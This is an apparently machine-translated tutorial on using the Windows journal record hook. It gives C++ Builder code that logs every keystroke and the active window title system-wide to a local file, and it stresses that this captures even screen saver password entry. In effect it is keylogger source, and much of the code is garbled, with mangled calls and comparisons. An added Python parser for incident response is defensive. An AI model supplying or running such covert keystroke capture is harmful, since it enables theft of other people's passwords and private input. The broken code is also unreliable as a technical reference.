Using the journal record hook (WH_JOURNALRECORD)

Source: Internet
Author: User
---- Hooks are an important part of the Windows message-processing mechanism. By installing a hook, an application can register a subroutine that monitors message traffic in the system and processes messages before they reach the target window procedure. There are many hook types, and each intercepts its own class of messages: a keyboard hook intercepts keyboard messages, a mouse hook intercepts mouse messages, a shell hook intercepts the messages sent when applications start and close, and a journal record hook monitors and records input events.

---- Hooks are either thread-specific or system-wide (global). A thread-specific hook monitors only the specified thread; monitoring every thread in the system requires a global hook. For a global hook, the hook function must be placed in a separate dynamic-link library (DLL) so that it can be called from each of the affected applications.

---- The journal record hook (WH_JOURNALRECORD, called the "Log Hook" in the captions and variable names below) is a special case. It exists only as a global hook, it is called when messages from input devices such as the keyboard and mouse are removed from the system message queue, and the system can have only one such hook at a time. More importantly, its hook function does not have to live in a DLL, which saves the trouble of building one just to install a global hook.

---- A journal record hook can therefore monitor all kinds of input events. The following example uses one to record keyboard input: when a key is pressed, it automatically records the date and time of the keystroke and the name of the currently active window. The example was compiled under Windows 98 with Borland C++ Builder 4.

---- 1. Create a project and place two buttons, Button1 and Button2, on the form Form1. Set their captions to "Install Log Hook" and "Uninstall Log Hook" respectively.

---- 2. Define the following global variables:

Hhook g_hloghook = NULL; // hook variable hwnd g_hlastfocus = NULL; // record the window handle for the last focus. Const int keypressmask = 0x80000000; // The constant char g_prvchar In the keyboard mask; // save the last key value 3. in The onclick event of button1, enter: void _ fastcall tform1: button1click (tobject * sender) {If (g_hloghook = NULL) g_hloghook = callback (callback, (hookproc) journallogproc, hinstance, 0); // Installation Log Hook} 4. in The onclick event of button2, enter: void _ fastcall tform1: button2click (TOB Ject * sender) {If (g_hloghook! = NULL) {unhookwindowshookex (g_hloghook); g_hloghook = NULL;} // uninstall Log Hook} 5. input hook callback function: hookproc journallogproc (INT icode, wparam, lparam) {If (icode <0) Return (hookproc) callback (g_hloghook, icode, wparam, lparam ); if (icode = "= hc_action)" {eventmsg * pevt = "(eventmsg" *) lparam; int I; hwnd hfocus; // Save the current active window handle char sztitle [256]; // the current window name char sztime [128]; // Save the current date and time file * stream = "fopen (" C: \ Logfile.txt "," A + T ");" If (pevt-> message = wm_keydown) {int vkey = lobyte (pevt-> paraml ); // obtain the virtual key value char ch; char STR [10]; hfocus = getactivewindow (); // obtain the current active window handle if (g_hlastfocus! = Hfocus) // whether the current active window changes {getwindowtext (hfocus, sztitle, 256); g_hlastfocus = hfocus; strcpy (sztime, datetimetostr (now ()). c_str (); // get the current date and time fprintf (stream, "% C % S % C % s", 10, sztime, 32, 32, sztitle ); // write the file fprintf (stream, "% C", 32, 32);} int ishift = getkeystate (0x10); // test shift, caption, numlock and other keys whether to press int icapital = getkeystate (0x14); int inumlock = getkeystate (0x90); bool bshift = (ishift & keypressmask) = keypressm Ask; bool bcapital = (icaploud & 1) = 1; bool bnumlock = (inumlock & 1) = 1; if (vkey> = 48 & vkey <= 57) // number 0-9 If (! 
Bshift) fprintf (stream, "% C", vkey); If (vkey >=65 & vkey <= 90) // A-Z A-z {If (! Bcapital) if (bshift) CH = "vkey;" else CH = "vkey + 32;" else if (bshift) CH = "vkey + 32;" else CH = "vkey; "fprintf (stream," % C ", CH);} If (vkey >=96 & vkey <= 105) // keypad 0-9 If (bnumlock) fprintf (stream, "% C", vKey-96 + 48); If (vkey> = 186 & vkey <= 222) // other keys {Switch (vkey) {Case 186: if (! Bshift) CH = ";"; else CH = ":"; break; Case 187: If (! Bshift) CH = "="; else CH = "+"; break; Case 188: If (! Bshift) CH = ","; else CH = "<"; break; Case 189: If (! Bshift) CH = "-"; else CH = "_"; break; Case 190: If (! Bshift) CH = "."; else CH = ">"; break; Case 191: If (! Bshift) CH = "/"; else CH = "? "; Break; Case 192: If (! Bshift) CH = "'"; else CH = "~ "; Break; Case 219: If (! Bshift) CH = "["; else CH = "{"; break; Case 220: If (! Bshift) CH = "\"; else CH = "|"; break; Case 221: If (! Bshift) CH = "]"; else CH = "}"; break; Case 222: If (! Bshift) CH = "\" '; else CH = "\" "; break; default: CH =" N "; break;} If (Ch! = "N") fprintf (stream, "% C", CH);} // If (wparam> = 112 & wparam <= 123) // function key [F1]-[F12] If (vkey> = 8 & vkey <= 46) // direction key {Switch (vkey) {Case 8: strcpy (STR, "[BK]"); break; Case 9: strcpy (STR, "[Tab]"); break; Case 13: strcpy (STR, "[En]"); break; Case 32: strcpy (STR, "[Sp]"); break; Case 33: strcpy (STR, "[PU]"); break; Case 34: strcpy (STR, "[Pd]"); break; Case 35: strcpy (STR, "[end]"); break; Case 36: strcpy (STR, "[home]"); Break; Case 37: strcpy (STR, "[LF]"); break; Case 38: strcpy (STR, "[UF]"); break; Case 39: strcpy (STR, "[RF]"); break; Case 40: strcpy (STR, "[DF]"); break; Case 45: strcpy (STR, "[ins]"); break; Case 46: strcpy (STR, "[del]"); break; default: CH = "N"; break;} If (Ch! = "N") {If (g_prvchar! = "Vkey)" {fprintf (stream, "% s", STR); g_prvchar = "vkey; "}}} if (pevt-> message = wm_lbuttondown | pevt-> message = wm_rbuttondown) {hfocus = getactivewindow (); If (g_hlastfocus! 
= Hfocus) {g_hlastfocus = hfocus; getwindowtext (hfocus, sztitle, 256); strcpy (sztime, datetimetostr (now ()). c_str (); // get the current date and time fprintf (stream, "% C % S % C % s", 10, sztime, 32, 32, sztitle ); // write the file fprintf (stream, "% C", 32, 32) ;}} fclose (Stream); Return (hookproc) callnexthookex (g_hloghook, icode, wparam, lparam );}

---- After the project is compiled and run, the name of the current window is written to the file c:\logfile.txt each time a window is activated, and each key press is written to the same file as a key name. Not every key is handled here; add further cases as needed.

---- Key presses can also be captured with a keyboard hook, but a journal record hook is much easier to use. First, capturing keys typed into other applications requires a global hook, and a global keyboard hook must be placed in a separate DLL, whereas the journal record hook need not be. Second, by the time a keyboard hook function receives a key, the system has already processed the input, so if the system blocks those keys the keyboard hook cannot see them. For example, while a screen saver password is being entered, a keyboard hook cannot detect the characters the user types, but the journal record hook can.
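
---- For incident response, a file in the layout described above can be parsed to scope which windows had input captured. This is an added example, not code from the original article: it assumes each record is a newline, a timestamp, two spaces, the window title, two spaces and then the keys, and the function names and sample text are constructed for illustration.

```python
import re
from collections import Counter

# Key names the article's callback writes; casing on the page is inconsistent.
KEY_TOKENS = {"BK", "TAB", "EN", "SP", "PU", "PD", "END", "HOME",
              "LF", "UF", "RF", "DF", "INS", "DEL"}
TOKEN_RE = re.compile(r"\[([A-Za-z]{2,4})\]")

def tokenize(keys):
    """Split the key area into literal characters and known [..] key names."""
    out, i = [], 0
    while i < len(keys):
        m = TOKEN_RE.match(keys, i)
        if m and m.group(1).upper() in KEY_TOKENS:
            out.append("[" + m.group(1).upper() + "]")
            i = m.end()
        else:                       # a typed character, including a literal '['
            out.append(keys[i])
            i += 1
    return out

def parse_journal_log(text):
    """Return one record per window activation found in recovered log text."""
    records = []
    for line in text.split("\n"):
        if "  " not in line:
            continue                # blank, or not in the assumed layout
        timestamp, rest = line.split("  ", 1)
        # Space is logged as [Sp], so the last double space ends the title.
        title, sep, keys = rest.rpartition("  ")
        if not sep:                 # header only: no key area was written
            title, keys = rest, ""
        records.append({"timestamp": timestamp, "window": title,
                        "keys": tokenize(keys)})
    return records

def exposure_summary(records):
    """Count captured key events per window title, for incident scoping."""
    counts = Counter()
    for rec in records:
        counts[rec["window"]] += len(rec["keys"])
    return dict(counts)

# Constructed sample, not taken from a real system.
SAMPLE = ("\n1999-05-12 14:23:05  Untitled - Notepad  hello[Sp]world[BK][En]"
          "\n1999-05-12 14:24:10  Login  ab[Tab]cd[home]")

print(exposure_summary(parse_journal_log(SAMPLE)))
```

The timestamp format depends on the locale of the machine that wrote the file, so the parser only relies on the double-space separators and not on any particular date layout.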

---- Whatever the hook type, a hook adds to the time the system spends processing messages and so reduces system performance. Install hooks only when necessary, and remove them as soon as possible.
